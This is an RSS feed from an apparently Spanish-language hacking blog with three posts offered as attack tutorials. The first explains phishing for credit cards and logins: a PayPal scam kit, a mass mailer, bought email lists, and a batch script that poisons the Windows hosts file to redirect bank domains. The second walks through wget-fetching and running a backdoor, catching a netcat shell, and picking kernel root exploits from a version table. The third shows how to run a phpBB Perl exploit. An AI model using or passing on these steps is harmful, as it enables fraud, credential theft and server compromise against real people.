<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>BlogDelHacker &#187; ansatsu</title>
	<atom:link href="http://www.blogdelhacker.com/author/ansatsu/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.blogdelhacker.com</link>
	<description>Blog sobre seguridad, redes, vulnerabilidades, hacking linux y windows...</description>
	<pubDate>Sun, 09 Mar 2008 00:47:38 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5</generator>
	<language>en</language>
			<item>
		<title>Phising y Pharming</title>
		<link>http://www.blogdelhacker.com/2008/03/08/97/</link>
		<comments>http://www.blogdelhacker.com/2008/03/08/97/#comments</comments>
		<pubDate>Sat, 08 Mar 2008 22:42:42 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Asaltando Windows]]></category>

		<category><![CDATA[Asaltando los sistemas]]></category>

		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2008/03/08/97/</guid>
		<description><![CDATA[Bien pues se escribio un tutorial asi que ya masomenos saben que es.
ahora les voy a explicar como hacerlo para digamos obtener  tarjetas de credito, logins,  que se yo&#8230;
Material:
Scam
Hacked Host
Mail list
Mailer Inbox
Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html
Lo descomprimimos, lo submos a algun hacked host [...]]]></description>
			<content:encoded><![CDATA[<p>Bien pues se escribio un tutorial asi que ya masomenos saben que es.<br />
ahora les voy a explicar como hacerlo para digamos obtener  tarjetas de credito, logins,  que se yo&#8230;</p>
<p>Material:<br />
Scam<br />
Hacked Host<br />
Mail list<br />
Mailer Inbox</p>
<p>Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal<br />
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html</p>
<p>Lo descomprimimos, lo submos a algun hacked host o algun host que tengamos y cuando lo tenemos montado lo probamos y  nos dedicamos a buscar cuentas de correo para mandarles el scam, pueden buscar con algun extractor de mails correos , pero como<br />
siempre estan quemados y es posible que algunos no funcionen, lo mas conveniente es decirle a algun wey que se dedique a esto a que te haga el paro y te venda algun mail list para paypal (podria ser de cualquier cosa, banamex, hi5, etc ) si no buquen<br />
por la red hay bastantes, yo les recomiendo el elite extractor, o el tarantula..<span id="more-97"></span></p>
<p>Bien ya que tenemos un mail list, conseguimos algun mailer inbox, aqui les dejo la descarga de uno<br />
http://rapidshare.com/files/76390702/mailerpriv8.php</p>
<p>Lo subimos a algun hacked host, no recomiendo host gratuito porque no los envia, ya teniendolo buscamos la letter del scam<br />
(que es lo que se escribe para engañar a la victima)<br />
y si tenemos una letter para pharming nos dedicamos a crear uno <img src='http://www.blogdelhacker.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>Antes de seguir, el pharming es un metedo que consiste en manipular las dns que usa la victima haciendole creer que entra a una web pero en realidad esta en otra (por ejemplo en el scam)</p>
<p>Ejemplo en batch<br />
<code><br />
@echo off<br />
echo ipdetuhost  www.banamex.com.mx &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.bbva.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.bancomer.com.mx &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.esmas.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.hotmail.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
exit</code></p>
<p>Como veran de esta manera cuando la victima ejecute este archivo y entre a banamex, bbva, bancomer desde el explorador  sera redirigido a ipdetuhost y de esta manera el usuario no se va a dar cuenta que realmente esta en una web fake <img src='http://www.blogdelhacker.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Solo es teoria en general pero poco a poco AHhahAH</p>
<p>&#8211;StATiK&#8211;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/03/08/97/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Conectando Backdoor</title>
		<link>http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/</link>
		<comments>http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/#comments</comments>
		<pubDate>Sun, 18 Mar 2007 23:32:58 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Asaltando los sistemas]]></category>

		<category><![CDATA[General]]></category>

		<category><![CDATA[Trabajando en Linux]]></category>

		<category><![CDATA[Trabajo en Windows]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/</guid>
		<description><![CDATA[Ya que rush ha publicado, como atakar mediante rfi; Ahora nos proponemos a utilizar un exploit y un backdoor en la victima; lo primero&#8230;
nos fijamos que carpetas tienen permisos (casi siempre es en tmp)
find -perm 777
ya que nos encontramos en la carpeta vulnerable hacemos esto
cd /tmp
ahora estamos en /tmp bien, tenemos permisos para descargar cosas [...]]]></description>
			<content:encoded><![CDATA[<p>Ya que rush ha publicado, como atakar mediante rfi; Ahora nos proponemos a utilizar un exploit y un backdoor en la victima; lo primero&#8230;</p>
<p>nos fijamos que carpetas tienen permisos (casi siempre es en tmp)</p>
<blockquote><p>find -perm 777</p></blockquote>
<p>ya que nos encontramos en la carpeta vulnerable hacemos esto</p>
<blockquote><p>cd /tmp</p></blockquote>
<p>ahora estamos en /tmp bien, tenemos permisos para descargar cosas y ejecutarlas , nos disponemos a hacerlo</p>
<blockquote><p>cd /tmp;wget web/backdoor/5553; chmod 777 5553; ./5553</p></blockquote>
<p>Lo que hicimos fue, descargarlo (wget) darle permisos al archivo (chmod 777) y ejecutarlo (./5553), ahora esta trabajando sobre el puerto 5553</p>
<p>ahora nos abrimos el netcat,y de esta maneraestamos diciendole al netcat que se ponga a la escucha del puerto 5553 y que nos devuelva la shell</p>
<blockquote><p>-vv -l -p 5553</p></blockquote>
<blockquote><p>nc<br />
Cmd line: -vv -l -p 5553<br />
listening on [any] 5553 &#8230;</p></blockquote>
<p><span id="more-41"></span>Ya que nos devuelve la shell, nos fijamos que kernel lleva</p>
<blockquote><p>uname -a;pwd;id</p></blockquote>
<p>sabiendo su version sabras que r00t exploit usar, les dejo la lista para cada una&#8230;</p>
<p><code>2.4.17    -&gt; newlocal, kmod, uselib24<br />
2.4.18    -&gt; brk, brk2, newlocal, kmod<br />
2.4.19    -&gt; brk, brk2, newlocal, kmod<br />
2.4.20    -&gt; ptrace, kmod, ptrace-kmod, brk, brk2<br />
2.4.21    -&gt; brk, brk2, ptrace, ptrace-kmod<br />
2.4.22    -&gt; brk, brk2, ptrace, ptrace-kmod<br />
2.4.22-10 -&gt; loginx<br />
2.4.23    -&gt; mremap_pte<br />
2.4.24    -&gt; mremap_pte, uselib24<br />
2.4.25-1  -&gt; uselib24<br />
2.4.27    -&gt; uselib24<br />
2.6.2     -&gt; mremap_pte, krad, h00lyshit<br />
2.6.5     -&gt; krad, krad2, h00lyshit<br />
2.6.6     -&gt; krad, krad2, h00lyshit<br />
2.6.7     -&gt; krad, krad2, h00lyshit<br />
2.6.8     -&gt; krad, krad2, h00lyshit<br />
2.6.8-5   -&gt; krad2, h00lyshit<br />
2.6.9     -&gt; krad, krad2, h00lyshit<br />
2.6.9-34  -&gt; r00t, h00lyshit<br />
2.6.10    -&gt; krad, krad2, h00lyshit<br />
2.6.13    -&gt; raptor, raptor2, h0llyshit, prctl<br />
2.6.14    -&gt; raptor, raptor2, h0llyshit, prctl<br />
2.6.15    -&gt; raptor, raptor2, h0llyshit, prctl<br />
2.6.16    -&gt; raptor, raptor2, h0llyshit, prctl</code></p>
<p>ya sabiendo que exploit usar, hacemos casi lo mismo que con el backdoor, lo descargamos,</p>
<blockquote><p>wget laweb.com/exploit/kmod</p></blockquote>
<blockquote><p>Connecting to laweb.com:80&#8230; connected!<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 14,860 [text/plain]</p>
<p>0K &#8230;&#8230;&#8230;. &#8230;. 100% @ 70.79 KB/s</p>
<p>23:26:39 (70.45 KB/s) - `kmod&#8217; saved [14860/14860]</p></blockquote>
<p>, se sube, y ahora viene lo bueno le damos permisos y lo ejecutamos</p>
<blockquote><p>chmod 777 kmod; ./kmod</p></blockquote>
<p>si nos fue bien saldra algo como esto</p>
<blockquote><p>chmod 777 kmod; ./kmod<br />
[+] Attached to 30330<br />
[+] Waiting for signal<br />
[+] Signal caught<br />
[+] Shellcode placed at 0&#215;40011aed<br />
[+] Now wait for suid shell&#8230;<br />
sh-2.05#<br />
sh-2.05# id<br />
id<br />
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys)</p>
<p>4(adm),6(disk),10(wheel)</p></blockquote>
<p>y bueno ahora somos r00t, ya sabran ustedes que hacer, en la proxima entrega les dire como hacer mass deface</p>
<p>SaLuDoS</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Ejecutando Exploit en Perl</title>
		<link>http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/</link>
		<comments>http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/#comments</comments>
		<pubDate>Sat, 17 Feb 2007 19:36:17 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Trabajo en Windows]]></category>

		<category><![CDATA[Utilidades Hack]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/</guid>
		<description><![CDATA[Cuando tenemos un exploit en perl lo primero que tenemos que hacer es guardarlo en una extension .pl, posteriormentetenemos conseguir un interprete de perl (si lo deseas descargate el cygwin obviamente con aquel paquete) pero ahora lo haremos con el activeperl, lo descargas, lo instalas, y nos vamos al simbolo del sistema(estamos trabajando sbre windows) [...]]]></description>
			<content:encoded><![CDATA[<p>Cuando tenemos un exploit en perl lo primero que tenemos que hacer es guardarlo en una extension .pl, posteriormentetenemos conseguir un interprete de perl (si lo deseas descargate el cygwin obviamente con aquel paquete) pero ahora lo haremos con el <a href="http://www.activeperl.com">activeperl, </a>lo descargas, lo instalas, y nos vamos al simbolo del sistema(estamos trabajando sbre windows) y tecleamos:</p>
<blockquote><p>cd C:PerlBin</p></blockquote>
<p>El perl, lo instale en esa carpeta, si lo instalaste en otra solo es cuestion de cambiarla de directorio con el comando cd, de esta manera nos devuelve algo asi:</p>
<blockquote><p>C:PerlBin&gt;</p></blockquote>
<p><span id="more-25"></span>Ahora nos toca interpretar el exploit, y nos vamos a su carpeta con el cd.</p>
<pre></pre>
<blockquote><p>perl C:Exploitsexploit.pl</p></blockquote>
<pre></pre>
<p>Y obtendremos algo como esto:</p>
<blockquote><p>Microsoft Windows XP [Versión 5.1.2600<br />
(C) Copyright 1985-2001 Microsoft Corp.</p>
<p>C:Documents and SettingsAdministrador&gt;cd C:PerlBin</p>
<p>C:perlbin&gt;perl C:cygwinexploitshola.pl</p>
<p>***************************************************<br />
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy &lt;optional&gt;]<br />
i.e. perl nenu.pl www.site.com /forum/BigAdmin 127.0.0.1:3128<br />
****************************************************</p></blockquote>
<pre></pre>
<p>Nos dice claramente como usar el exploit, ya es de cada uno como los explota</p>
<p>Texto escrito por: ansatsu</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
